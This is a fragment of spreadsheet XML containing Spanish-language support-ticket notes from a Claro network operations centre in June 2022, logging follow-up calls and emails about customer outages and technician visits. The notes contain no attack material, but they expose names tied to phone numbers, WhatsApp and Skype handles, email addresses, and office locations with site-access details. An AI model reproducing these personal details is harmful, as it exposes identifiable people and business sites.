    <t>SE CONVERSA CON CLIENTE EGEL PAREDES, INDICA QUE SE QUEDARON SIN SERVICIO, POR LO QUE APLICARON REINICIO AL ROUTER DE CLARO, LUEGO DE ELLO SE RESTABLECIÓ PERO QUEDO INTERMINTENTE DE 11:30 A 12:30 APROXIMADAMENTE , POR ELLO REALIZO EL REPORTE, PERO QUE LUEGO SE MANTUVO ESTABLE HASTA EL MOMENTO POR LO QUE SOLICTA MONITOREO HASTA LAS 16:40 HORAS DE HOY, DEBIDO A QUE FINALIZAN LABORES A LAS 17:00 HORAS.
NÚMERO: 34500868
FIN: HOY, 15:03
ID DE LLAMADA: 3001395816</t>
  </si>
  <si>
    <t>F4602848</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO MOLINA 50688440492 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001513591</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MAURICIO MOLINA, QUIEN SOLICITA SE VALIDE EL SERVICIO EL DIA DE MAÑANA A LAS 8:00AM
INDICA QUE HASTA EL MOMENTO NO HA PRESENTADO INCONVENIENTES.</t>
  </si>
  <si>
    <t>SE HABLO CON EL EJECUTIVO DAVID BARRIOS, QUIEN VA A ENLAZAR AL CLIENTE QUE ESTA EN COSTA RICA.
3001399272
COLA:
NOMBRE: A: 58260838
NÚMERO: 58260838
DURACIÓN: 0:01:37
ESTADO: CONECTADA
DETALLES: 58260838
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:10:48</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA PERO NO CONTESTAN.
3001398755
COLA:
NOMBRE: A: 66709300
NÚMERO: 66709300
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 66709300
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:08:34</t>
  </si>
  <si>
    <t>F4602857</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAO PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001436772</t>
  </si>
  <si>
    <t>F4602890</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO NUEVAMENTE A CLIENTE
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE PARA EL ATM: CC_TYT_GT_ATM0163, SOLICITAMOS SU APOYO COMPARTIENDO INFORMACIÓN CON RESPECTO A LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4602910</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
MIÉ 15/06/2022 1:50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2910¿
ID: 8901226T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0593
UBICADO EN: 2A. CALLE 1-30, ZONA 1 FRENTE AL PARQUE CENTRAL DE SAN FRANCISCO ZAPOTITLAN, SUCHITEPEQUEZ¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4602917</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 14:53
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; RAMOS LERIZTA ILIANA &lt;IRLERIZT@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 5446893 ::: TICKET CNOC IMBBL004294 ::: "SERVICIO FUERA"
BUEN DÍA, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN 190.212.127.145 DE PUNTO REMOTO.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE +52 (55) 5174 5299 MENCIONA QUE YA TIENEN VALIDADO EL TICKET INTERNO
-ID 3001440851</t>
  </si>
  <si>
    <t>F4602939</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JENER SAMAYOA 58589192 NO RESPONDE | SE INTENTARA LUEGO **
-ID 3001481621
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JENER SAMAYOA 58589192 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001488908</t>
  </si>
  <si>
    <t>F4602941</t>
  </si>
  <si>
    <t>SE LLAMA A JIMMY PARA VALIDAR PERO NO RESPONDE---</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: CALCESA - SD1135435</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 17:26
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; JAVELDANO@MEDIASCASINO.COM &lt;JAVELDANO@MEDIASCASINO.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: CALCESA - SD1135435
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4602943</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HUGO GARCÍA 78684047 RESPONDE RAFAEL (EJECUTIVO) QUIEN COLOCA EN LINEA AL CLIENTE MENCIONA QUE EL SERVICIO ES INESTABLE EN LAS HABITACIONES, SE NOTIFICARA PARA EL SEGUIMIENTO
76039145 - HUGO GARCÍA
-ID 3001407495</t>
  </si>
  <si>
    <t>F4602975</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JOSE COFIÑO QUIEN INDICA QUE ESTA EN SU HORA DE ALMUERZO SOLICITA QUE SE LLAME EN 40MIN.
3001387811
COLA:
NOMBRE: A: 57286277
NÚMERO: 011 50257286277
DURACIÓN: 0:00:18
ESTADO: CONECTADA
DETALLES: +50257286277
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 14:35:35</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL OP108 SI TIENE LINK DE FO PERO EL CH1 AL CH4 SE MIRA EN ROJO.
SE LE PIDIO QUE REINCIARA LA PBX.</t>
  </si>
  <si>
    <t>F4602977</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 15:51
PARA: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; JOSE.LOPEZ@GRUPOFERROMAX.COM &lt;JOSE.LOPEZ@GRUPOFERROMAX.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: FERROMAX | 400000054T
*-*-*-*-*-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS LOPEZ 50376027365  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001412125</t>
  </si>
  <si>
    <t>F4602979</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE DANIEL JOYA QUIEN SE DA POR ENTERADO DE QUE LA VISITA SE REALIZARA EL DIA DE MAÑANA A LAS 8:00AM
3001397966
COLA:
NOMBRE: A: 0050372930145
NÚMERO: 0050372930145
DURACIÓN: 0:00:23
ESTADO: CONECTADA
DETALLES: 0050372930145
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:05:37</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE DANIEL JOYA 72930145
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL DIA DE AYER HUBO PROBLEMAS DE ENERGIA EN SITIO Y DEJARON DESCONECTADOS LOS EQUIPOS HOY CUANDO LO VOLVIERON A CONECTAR EL EQUIPO NO ENCENDIA Y LO CAMBIO DE TOMA Y CAMBIO DE PUERTO EN EL UPS PERO EL MODEM SIGUE SIN ENCENDER, SOLICITA VISITA TECNICA PARA EL CAMBIO DEL EQUIPO POSIBLEMENTE SE ENCUENTRA DAÑADO. NO ES NECESARIO TRAMITAR PERMISOS PARA EL INGRESO A LS INSTALACIONES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON DANIEL JOYA 72930145 QUIEN NOS CONFIRMA QUE EL SERVICIO YA ESTA RESTABLECIDO, NOS AUTORIZA EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4602983</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE GESTIÓN N1 A LO DICHO EN CRONO ANTERIOR, SE LES HACE RECORDATORIO PARA PROCEDER AL CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4602999</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
ASUNTO: ANCHO DE BANDA CHOLOMA 2 192.168.50.0/24
JURGEN RENE BOCH CAAL
BUEN DÍA,
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITAMOS SU APOYO REALIZANDO PRUEBAS, ENLACE FUE ESCALADO A PERSONAL DE BOIP, QUIENES REALIZARON UN CAMBIO EN EL PREFIX DE CAPA 3 EN LOS EQUIPOS DE CLARO. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.
.</t>
  </si>
  <si>
    <t>F4603009</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA ANDRES 30182930 MENCIONA QUE EL SERVICIO ES MUY LENTO, CLIENTE SOLICITA VISITA TECNICA
-ID 3001479007
NOMBRE DEL CLIENTE: PRESA POLANCO QUEVEDO ORANTES SOCIEDA  CIVIL
UBICACIÓN:19 CALLE 5-47 ZONA 10 EDIFICIO UNICENTRO NIVEL 8 OFICINA 801
CONTACTO EN SITIO: MARIA ANDRES 30182930
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS:UNICAMENTE LLEGAR IDENTIFICADOS
*-*-*</t>
  </si>
  <si>
    <t>F4603012</t>
  </si>
  <si>
    <t>*- SE ESCRIBE A JUAN JOSE MAXIA VIA SKYPE, NO RESPONDE, SE ENVÍA CORREO, QUEDAMOS  A LA ESPERA POR DICHO MEDIO PARA LA VALIDACION Y/O CIERRE-*
RE: RECUPERAR GESTION DE ENLACE 62900080T AGENCIA Y FABRICA HONDA S.A.</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE, JOSE, INDICA QUE NO TIENE CONOCIMIENTO DEL CASO, POR LO QUE SE CONTACTARA  A CONTROL Y CAMBIOS PARA NOTIFICAR QUE SE TIENE GESTION DEL CPE POR MEDIO DE LA LOOBACK CON IP 10.212.202.118
NÚMERO: 47516007
FIN: HOY, 08:46
ID DE LLAMADA: 3001486867</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, JOSE, PERO NO SE ESCUCHA CLARAMENTE, POR LO QUE SOLICITA SE LE LLAME AL UN NUMERO, PERO NO SE LOGRA IDENTIFICAR LOS DIGITOS, POR LO QUE SE LE SOLICITA ENVIARLO AL WHATSAPP 42105135
3001482460
COLA:
NOMBRE: A: 35658149
NÚMERO: 35658149
DURACIÓN: 0:05:23
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 35658149
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 16/06/2022 08:31:29</t>
  </si>
  <si>
    <t>TICKET APERTURADO A SOLICITUD DE CONTROL DE CAMBIOS CLARO PARA RECUPERAR GESTIÓN DE LOS EQUIPOS; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE LO DICHO EN CRONOS ANTERIORES.</t>
  </si>
  <si>
    <t>F4603014</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR COC INDICA QUE SE LE LLAME EN 1 HORA PARA QUE CONFIRME SI EXISTE UN INCONVENIENTE.
3001398076
COLA:
NOMBRE: A: 30264834
NÚMERO: 30264834
DURACIÓN: 0:01:31
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 30264834
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 15/06/2022 15:07:15</t>
  </si>
  <si>
    <t>F4603028</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE XOCHILTL 86392993 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001448722</t>
  </si>
  <si>
    <t>LUEGO DEL REINICIO SE EL INDICA A CLIENTE, EL ESTADO DE LUCES LED, INDICA LO SIGUIENTE PWR =ROJO,  NET 1 = VERDE, ETH 3 =APAGADO. SE LE SOLICITA REVISAR CABLE WAN, INDICA QUE NO SE TIENE LINK Y CAMBIA EL PATCHCORD, RESTABLECIENDO A NIVEL WAN EL SERVICIO.
3001414411
COLA:
NOMBRE: A: 0050586392993
NÚMERO: 0050586392993
DURACIÓN: 0:10:16
ESTADO: CONECTADA
DETALLES: 0050586392993
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 15/06/2022 16:05:39</t>
  </si>
  <si>
    <t>F4603038</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXIS PEREZ 70132795 PARA BRINDAR RETROALIMENTACION
-ID 3001504098</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEXIS PEREZ 70132795 - 23935008 MENCIONA QUE SI CUENTAN CON ENERGIA EN PR, CLIENTE BRINDA DATOS DE VISITA
-ID 3001435014 - 3001435179
NOMBRE DEL CLIENTE: CONSEJO NACIONAL DE LA NIÑEZ Y DE LA ADOLESCENCIA
UBICACIÓN:2AV NORTE Y 5 CALLE ORIENTE #19 BARRIO EL SANTUARIO, SAN VICENTE ESQUINA OPUESTA AL CENTRO JUDICIAL DE SAN VICENTE
CONTACTO EN SITIO:  ALEXIS PEREZ - 70132795
HORARIO DE ATENCION:8.00 - 16:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4603041</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBIN PALENCIA 48284927 QUIEN ESTA DE ACUERDO CON VISITA PARA LAS 8 HRS ||
3001418953
COLA:
NOMBRE: A: 48284927
NÚMERO: 011 50248284927
DURACIÓN: 0:01:26
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50248284927
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 15/06/2022 16:12:28</t>
  </si>
  <si>
    <t>F4603046</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RODRIGUEZ AL 78843777  INDICA QUE ACABA DE ENVIAR EL CORREO CON LAS IP QUE LE ESTAN DANDO PROBLEMAS **
-ID 3001474012
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS RODRIGUEZ  78843777 PROBLEMAS PARA ENVIAR Y RECIBIR CORREOS EN ALGUNOS DOMINIOS SE LE INDICA QUE ENVIE CORREO CON CAPTURAS Y SE LE BRINDAN LOS CORREOS A CLIENTE, INDICA QUE AHORITA LO ESTARA ENVIANDO PORQUE LE URGE || SE NOTIFICA A GESTOR **
-ID 3001408770
**
**</t>
  </si>
  <si>
    <t>SE RECIBECORREO DE CLIENTE, SE PROCEDE A VALIDAR
DE: LUIS EUGENIO RODRÍGUEZ CRISTALES &lt;LUIS@SEDI.COM.SV&gt;
ENVIADO: JUEVES, 16 DE JUNIO DE 2022 7:37
PARA: CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; INFORMATICO &lt;INFORMATICO@CAJASANIGNACIO.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE REVISION
ESTIMADOS SEÑORES:
ESTA SOLICITUD CORRESPONDE AL NUMERO DE CASO SD1135469, SERVICIO DE INTERNET DEDICADO A NOMBRE DE CAJA DE CRÉDITO DE SAN IGNACIO. NO PODEMOS ENVIAR NI RECIBIR CORREOS A CIERTOS DOMINIOS, EJ.:
CORREOS HACIA 190.150.7.152 MAIL.SEDI.COM.SV
NI RECIBIR CORREOS DESDE 198.71.225.98, UBICACIÓN DE NUESTRA PAGINA WEB
EN AMBOS CASOS LA RESPUESTA ES "CONNECTION REFUSED", LO CUAL ES UN FACTOR EXTERNO A NUESTRO SERVIDOR DE CORREOS PUES ESTE NO TIENE RESTRICCIONES HACIA Y DESDE ESAS IPS.
AGRADECERÍA PRONTA REVISIÓN.
ATENTAMENTE
LUIS EUGENIO RODRÍGUEZ CRISTALES
SERVICIOS ELECTRÓNICOS DIGITALES
LUIS@SEDI.COM.SV
(503)22257576, (503)78425995
WHATSAPP: (503)78843777
SKYPE: LUISCRISTALES</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ  78843777-23939601 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001404672 - 3001405175</t>
  </si>
  <si>
    <t>F4603088</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ALEXANDRA FLORIZABAL 49328491 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO  KEVYN - 55792413
-ID 3001497106</t>
  </si>
  <si>
    <t>CLIENTE ALEXANDRA INDICA QUE SI TUVO REPORTE EN SITIO DE CAIDA DEL SERVICIO PERO ELLA NO SE ENCUENTRA EN SITIO POR LO QUE INDICA QUE SI SE REQUIERE DE PRUEBAS SERIA EL DIA DE MAÑANA YA QUE EN FISCALIA SE RETIRAN A LAS 4 PM-</t>
  </si>
  <si>
    <t>ENLACE CAÍDO, PR SE RETIRÓ, SE CONTINUARÁ SEGUIMIENTO DEL TICKET MAÑANA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVYN - 55792413 MENCIONA QUE SI CUENTA CON ENERGIA EN PR, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001497867</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDRA FLORIZABAL 49328491 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001488117
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDRA FLORIZABAL 49328491 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001480542 - 3001481559</t>
  </si>
  <si>
    <t>F4603097</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAYRA CASTELLANOS 42795045 MENCIONA QUE PERSISTE EL INCONVENIENTE
CLIENTE MENCIONA QUE SE CONECTAN POR MEDIO DE WIFI, SE VALIDA CON GESTOR QUE NO SE BRINDA WIFI
-ID 3001427862</t>
  </si>
  <si>
    <t>SE TENÍA EN LÍNEA A SAIRA CASTELLANOS/CLIENTE 42795045, SE LE INDICA QUE ENLACE OK; SE LLAMÓ HASTA 3 VECES A GESTIÓN PARA CONFIRMAR LO ANTERIOR, NO CONTESTAN; CLIENTE SE RETIRA A LAS 18:00 HORAS, SE LE INDICA QUE GESTOR ASIGNADO LE LLAMARÁ EN 5/10 MINUTOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAYRA CASTELLANOS 42795045 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001664943</t>
  </si>
  <si>
    <t>F4603099</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001440851</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 16:38
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100022T ::: TICKET CNOC IMBBL004295 ::: " LINK DOWN"
BUEN DÍA, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN 10.87.195.114 DE PUNTO REMOTO.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4603103</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO 32873550 MENCIONA QUE NO SE PUEDE CONECTAR REMOTAMENTE, SE LE INFORMA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO BIEN
CLIENTE MENCIONA QUE VALIDARA A NIVEL INTERNO
-ID 3001419663 - 3001419769</t>
  </si>
  <si>
    <t>F4603104</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  KARLA 78415318 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001581783</t>
  </si>
  <si>
    <t>F4603107</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE FRANCISCO GONZALES QUIEN COMUNICA AL TECNICO DE IT  JORGE URBANO 76047758.
3001422706
COLA:
NOMBRE: A: 0050379464259
NÚMERO: 0050379464259
DURACIÓN: 0:00:15
ESTADO: CONECTADA
DETALLES: 0050379464259
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 16:23:34</t>
  </si>
  <si>
    <t>CLIENTE JORGE URBANO INDICA QUE PARA REVISAR EL ASMI TIENE QUE MOVER LOS EQUIPOS. SOLICITA QUE SE LE LLAME EN 15MIN.
3001423718
COLA:
NOMBRE: A: 0050376047758
NÚMERO: 0050376047758
DURACIÓN: 0:04:20
ESTADO: CONECTADA
DETALLES: 0050376047758
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 16:30:24</t>
  </si>
  <si>
    <t>F4603146</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGENTE ERIKA PEÑATE AL 24200018 CONTESTA EL AGENTE MARTINEZ CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001474750
**</t>
  </si>
  <si>
    <t>F4603157</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CARLOS CARACUN  AL 30727797  CONFIRMA SERVICIO ESTABLE Y OPERATIVO ||
 AUTORIZA CIERRE DE TICKET **
-ID 3001477468 - 3001477468
**</t>
  </si>
  <si>
    <t>F4603163</t>
  </si>
  <si>
    <t>BUENAS TARDES TENDRÁN INFORMACIÓN DE LA SIGUIENTE SUCURSAL CC_AZTECA_GT_SUC000355/265900014T
JORGE, 17:01
BUENAS TARDES, AUN ESTAMOS TRATANDO DE COMUNICARNOS CON LA SUCURSAL PARA VALIDAR SI HAY TEMA DE ENERGÍA</t>
  </si>
  <si>
    <t>F4603166</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ALFREDO 87743905 MENCIONA QUE EL EQUIPO MERAKI SOLICITARON SE RETIRARA (NO CUENTAN CON MERAKI EN PR)
MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001484054</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EN PR ODAIR ALVARADO  AL 98892204  NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001479607
**</t>
  </si>
  <si>
    <t>F4603177</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A OSCAR GIRÓN/EJECUTIVO CLARO; SE LE INDICA QUE SE ENVIÓ CORREO PARA QUE NOS COMPARTAN FOTOS DE LOS EQUIPOS, EJECUTIVO INDICA QUE HABLARÁ CON CLIENTE Y NOS COMPARTIRÁ LO SOLICITADO.</t>
  </si>
  <si>
    <t>F4603188</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. IVAN ORTEGA 96183452 ...</t>
  </si>
  <si>
    <t>F4603197</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA VALIDAR SIN EMBARGO NO RESPONDE--
77425503</t>
  </si>
  <si>
    <t>F4603225</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANDRA PORTILLO 77425503 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001445378</t>
  </si>
  <si>
    <t>F4603251</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS EN CONJUNTO CON TEC MOLINA Y CLIENTE ISBELA ACEYTUNO QUIEN VALIDA EL SERVICIO OPERATIVO EN LLAMADAS ENTRANTES Y
SALIENTES.
RESULTADO: CONTESTADA
NOMBRE: 0050431904892
NÚMERO: 0050431904892
INICIO: HOY, 01:54 P. M.
FIN: HOY, 02:11 P. M.
DURACIÓN: 17:17
ID DE LLAMADA: 3001597173</t>
  </si>
  <si>
    <t>SE LLAMA DE NUEVO AL CLIENTE SANDRA NO SE TIENE RESPUESTA.
3001517763
COLA:
NOMBRE: A: 0050432545025
NÚMERO: 0050432545025
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050432545025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 10:11:37
3001518153
COLA:
NOMBRE: A: 0050432545025
NÚMERO: 0050432545025
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 0050432545025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 10:11:52</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SANDRA NO SE TIENE RESPUESTA.
3001499207
COLA:
NOMBRE: A: 0050432545025
NÚMERO: 0050432545025
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050432545025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 09:19:32
3001499642
COLA:
NOMBRE: A: 0050432545025
NÚMERO: 0050432545025
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 0050432545025
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 16/06/2022 09:19:41</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE DE  NUEVO PARA QUE NOS PUEDAN BRINDAR CONTACTO EN EL PUNTO REMOTO
RE: PROBLEMAS CON FACTURA DE LÍNEA FIJA Y SU FUNCIONAMIENTO
ESVIN ANTONIO PAREDES SAMUY
